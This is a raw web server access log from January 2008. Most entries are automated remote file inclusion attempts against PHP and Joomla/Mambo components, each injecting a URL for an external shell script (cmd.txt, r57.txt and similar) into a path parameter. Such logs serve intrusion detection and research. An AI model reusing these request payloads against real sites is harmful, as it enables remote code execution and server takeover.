69.61.30.100 - - [23/Jan/2008:06:56:19 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:06:56:19 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
200.11.67.242 - - [23/Jan/2008:06:58:05 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:06:58:42 -0800] "GET /index.php?option=com_comprofiler&task=usersList&Itemid=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:06:58:42 -0800] "GET /logs/index.php?option=com_comprofiler&task=usersList&Itemid=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
87.230.3.98 - - [23/Jan/2008:07:00:39 -0800] "GET /inc_ext/spaw/dialogs/table.php?spaw_root=http://geocities.com/lampungstreetart/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:07:03:15 -0800] "GET /checkout.php?abs_path=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
87.230.3.98 - - [23/Jan/2008:07:05:44 -0800] "GET /logs/access_071214.log/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.pilcom.net/data/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.26.137 - - [23/Jan/2008:07:05:44 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.3.98 - - [23/Jan/2008:07:05:45 -0800] "GET /inc_ext/spaw/dialogs/table.php?spaw_root=http://www.pilcom.net/data/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.3.98 - - [23/Jan/2008:07:05:46 -0800] "GET /logs/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.pilcom.net/data/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.26.219.82 - - [23/Jan/2008:07:05:47 -0800] "GET /logs/access_071229.log/display.php?table=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.26.219.82 - - [23/Jan/2008:07:05:47 -0800] "GET /display.php?table=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.26.219.82 - - [23/Jan/2008:07:05:48 -0800] "GET /logs/display.php?table=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.26.219.82 - - [23/Jan/2008:07:06:20 -0800] "GET /logs/access_071229.log/display.php?table=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.26.219.82 - - [23/Jan/2008:07:06:20 -0800] "GET /display.php?table=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.26.219.82 - - [23/Jan/2008:07:06:21 -0800] "GET /logs/display.php?table=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.109 - - [23/Jan/2008:07:07:12 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:07:08:32 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:07:08:32 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:07:08:33 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:07:08:33 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:07:08:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.26.219.82 - - [23/Jan/2008:07:10:18 -0800] "GET /logs/access_071229.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.26.219.82 - - [23/Jan/2008:07:10:19 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.26.219.82 - - [23/Jan/2008:07:10:19 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.199.108 - - [23/Jan/2008:07:11:33 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.websministry.com/cms/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.108 - - [23/Jan/2008:07:12:46 -0800] "GET /display.php?table=http://www.websministry.com/cms/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:07:12:48 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.56.183 - - [23/Jan/2008:07:13:59 -0800] "GET /logs/access_071214.log/inc_ext/spaw/dialogs/table.php?spaw_root=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.183 - - [23/Jan/2008:07:14:00 -0800] "GET /inc_ext/spaw/dialogs/table.php?spaw_root=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.183 - - [23/Jan/2008:07:14:01 -0800] "GET /logs/inc_ext/spaw/dialogs/table.php?spaw_root=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.204.70 - - [23/Jan/2008:07:17:57 -0800] "GET /logs/?mosConfig_absolute_path=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 200 31397 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.203.204.70 - - [23/Jan/2008:07:17:57 -0800] "GET /?mosConfig_absolute_path=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:07:18:00 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.78.86 - - [23/Jan/2008:07:19:06 -0800] "GET /logs/access_071229.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cervo.com/public/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.78.86 - - [23/Jan/2008:07:19:07 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cervo.com/public/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.78.86 - - [23/Jan/2008:07:19:07 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cervo.com/public/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.78.86 - - [23/Jan/2008:07:19:08 -0800] "GET /logs/access_071229.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cervo.com/public/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.78.86 - - [23/Jan/2008:07:19:08 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cervo.com/public/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.78.86 - - [23/Jan/2008:07:19:09 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cervo.com/public/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.3.98 - - [23/Jan/2008:07:19:49 -0800] "GET /logs/access_071214.log/inc_ext/spaw/dialogs/table.php?spaw_root=http://geocities.com/lampungstreetart/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
165.138.94.253 - - [23/Jan/2008:07:19:49 -0800] "GET /funny/ HTTP/1.1" 200 808 "http://www.google.com/search?q=intitle:%22index+of%22+funny&hl=en&safe=active&start=10&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "www.dmulk.com"
87.230.3.98 - - [23/Jan/2008:07:19:51 -0800] "GET /logs/inc_ext/spaw/dialogs/table.php?spaw_root=http://geocities.com/lampungstreetart/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:07:19:54 -0800] "GET /logs/access_080106.log/admin.php?include_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:07:19:54 -0800] "GET /admin.php?include_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:07:19:54 -0800] "GET /logs/admin.php?include_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [23/Jan/2008:07:21:39 -0800] "GET /logs/access_071214.log/admin.php?include_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:07:23:03 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:07:23:04 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:07:23:04 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.74.175.5 - - [23/Jan/2008:07:23:06 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [23/Jan/2008:07:25:28 -0800] "GET /logs/access_071229.log/display.php?table=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [23/Jan/2008:07:25:29 -0800] "GET /display.php?table=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [23/Jan/2008:07:25:29 -0800] "GET /logs/display.php?table=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:27:10 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:27:11 -0800] "GET //skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:27:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:29:26 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.162.165.68 - - [23/Jan/2008:07:30:19 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
12.162.165.68 - - [23/Jan/2008:07:30:20 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
65.38.105.213 - - [23/Jan/2008:07:32:07 -0800] "GET /logs/access.log//com_swmenupro/ImageManager/Classes/ImageManager.php=http://www.fraiserandmain.com/adguest/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.213 - - [23/Jan/2008:07:32:07 -0800] "GET //com_swmenupro/ImageManager/Classes/ImageManager.php=http://www.fraiserandmain.com/adguest/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.213 - - [23/Jan/2008:07:32:08 -0800] "GET /logs//com_swmenupro/ImageManager/Classes/ImageManager.php=http://www.fraiserandmain.com/adguest/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:34:51 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:34:51 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:34:51 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.56 - - [23/Jan/2008:07:36:05 -0800] "GET /logs/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.67.19.56 - - [23/Jan/2008:07:36:06 -0800] "GET /index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.87.131.98 - - [23/Jan/2008:07:36:20 -0800] "GET /index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.87.131.98 - - [23/Jan/2008:07:36:20 -0800] "GET /logs/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:07:36:59 -0800] "GET /logs/access_080106.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:07:37:00 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [23/Jan/2008:07:37:00 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.197.30.62 - - [23/Jan/2008:07:37:06 -0800] "GET /logs/access_080106.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.197.30.62 - - [23/Jan/2008:07:37:06 -0800] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.197.30.62 - - [23/Jan/2008:07:37:06 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.57.36 - - [23/Jan/2008:07:38:02 -0800] "GET /logs/access_071229.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.57.36 - - [23/Jan/2008:07:38:02 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.57.36 - - [23/Jan/2008:07:38:03 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:38:26 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [23/Jan/2008:07:38:50 -0800] "GET /logs/access_070731.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:07:40:41 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:07:40:42 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
207.6.218.68 - - [23/Jan/2008:07:42:49 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
207.6.218.68 - - [23/Jan/2008:07:42:50 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:07:43:11 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:07:43:16 -0800] "GET //skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:07:43:23 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:07:43:28 -0800] "GET /logs/access.log/config.php?path_to_root=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:07:43:28 -0800] "GET /config.php?path_to_root=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:07:43:28 -0800] "GET /logs/config.php?path_to_root=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:07:44:28 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:07:44:35 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:07:44:39 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:07:44:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [23/Jan/2008:07:44:51 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.69.192.133 - - [23/Jan/2008:07:45:57 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://ls8-projekt.de/cache/com_sef/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.14.110.31 - - [23/Jan/2008:07:46:06 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:48:23 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:48:23 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:48:23 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:07:49:27 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:07:49:27 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:07:49:27 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [23/Jan/2008:07:49:28 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.191 - - [23/Jan/2008:07:52:56 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [23/Jan/2008:07:54:36 -0800] "GET /logs/access_080113.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:07:54:47 -0800] "GET /logs/access_080112.log//templates/mangobery/footer.sample.php?Site_Path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.55.165 - - [23/Jan/2008:07:57:39 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [23/Jan/2008:07:57:52 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [23/Jan/2008:07:57:53 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [23/Jan/2008:07:57:53 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.100.242 - - [23/Jan/2008:07:57:57 -0800] "GET /logs//mambots/content/multithumb/lightbox/css//multithumb.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.100.242 - - [23/Jan/2008:07:57:57 -0800] "GET //mambots/content/multithumb/lightbox/css//multithumb.php?mosConfig_absolute_path=http://www.frackenpohl-poulheim.de//contenido/cronjobs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
81.174.65.31 - - [23/Jan/2008:07:57:59 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
